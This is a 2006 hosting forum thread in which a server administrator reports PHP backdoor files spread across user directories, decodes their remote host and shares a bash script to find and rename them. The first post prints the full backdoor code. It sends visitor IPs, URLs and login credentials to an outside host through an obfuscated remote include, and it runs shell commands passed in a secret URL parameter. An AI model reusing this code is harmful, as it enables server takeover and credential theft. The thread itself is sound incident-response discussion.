Results 1 to 8 of 8
-
02-08-2006, 11:05 PM #1Newbie
- Join Date
- Aug 2004
- Location
- Virginia Beach, VA
- Posts
- 13
New Vulnerabilities - Scary PHP Files ALL Over the Server
Not sure if any of you may have fallen to the same issues yet, but I'd recommend you do a "locate" or find of some files...here's some examples:
options.php
layout.php
configs.php
base.php
time.php
date.php
tests.php
fsav.php
There's plenty more out there. These files all contain some dirty code...here's an example:
Code:<?php error_reporting(0); if(isset($_POST["l"]) and isset($_POST["p"])){ if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));} else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];} }else{$user_auth="";} if(!isset($_POST["log_flg"])){$log_flg="&log";} if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_en code($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg)) { if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);} if($_POST["l"]=="special"){print "sys_active". `uname -a`;} } ?>
These files will INFEST your server. I have found them in almost EVERY user directory; meaning only safe_mode or suPHP could have stopped it. Cleaning them out is so difficult!
I think this problem is related to Gallery. About 10 of my clients reported broken Gallery templates today and then this happened. However, Wordpress templates were also broken, and phpBBfm templates; they are broken on their own.
It seems that the last two weeks has seen a HUGE jump in vulnerabilities...
Anyone else seeing this? Any ideas? Please?
-
02-08-2006, 11:34 PM #2Newbie
- Join Date
- Aug 2004
- Location
- Virginia Beach, VA
- Posts
- 13
Oh, and another thing...it also puts a .htaccess inside the directory with these phps that calls them on 404, which means you'll NEVER SEE IT in your apache logs.
-
02-09-2006, 12:18 AM #3Newbie
- Join Date
- Aug 2004
- Location
- Virginia Beach, VA
- Posts
- 13
Here, I wrote this to try to these files quickly...
The only thing they don't account for are directories with spaces in the name...
Code:updatedb for problemfiles in time base date tests configs include guest report layout download remote create options messages package properties; do list=`locate $problemfiles.php | grep "\/$problemfiles.php" | grep -v hackers"` for i in $list; do thecount=`grep base64_encode $i | wc -l` if [ $thecount -ne 0 ]; then mv $i $i.hackers fi done done
If there's a better solution, great...this is the quickest I could come up with.
-
02-09-2006, 12:38 AM #4Disabled
- Join Date
- Dec 2005
- Posts
- 106
Looks like a gallery exploit. Upgrade your galleries to the latest secure versions. Check out secunia.com for known vulnerabilities. Btw, you may try something like this to find exactly what it does.
<?php
print (base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9")
?>
-
02-09-2006, 12:43 AM #5Newbie
- Join Date
- Aug 2004
- Location
- Virginia Beach, VA
- Posts
- 13
Yeah, I tried that, got back that it was contacting:
http://bis.iframe.ru/master.php?r_addr=
Unfortunately, a file_get_contents against it doesn't work. I think the server is down (or overloaded from success of the hack?)
-
02-09-2006, 08:57 AM #6Web Hosting Master
- Join Date
- Feb 2005
- Posts
- 1,358
Are you using mod_security?
Eleven2 Web Hosting - World-Wide Hosting, Done Right!
-
02-09-2006, 09:03 AM #7Newbie
- Join Date
- Aug 2004
- Location
- Virginia Beach, VA
- Posts
- 13
Yes, I have mod_security loaded with every option I could find on the net except the IP blacklists (too much performance loss)
-
02-09-2006, 02:50 PM #8Newbie
- Join Date
- Aug 2004
- Location
- Virginia Beach, VA
- Posts
- 13
Oops! Problem in the code...here's a working version.
Code:updatedb for problemfiles in time base date tests configs include guest report layout download remote create options messages package properties; do list=`locate $problemfiles.php | grep "\/$problemfiles.php" | grep -v hackers` for i in $list; do thecount=`grep base64_encode $i | wc -l` if [ $thecount -ne 0 ]; then mv $i $i.hackers fi done done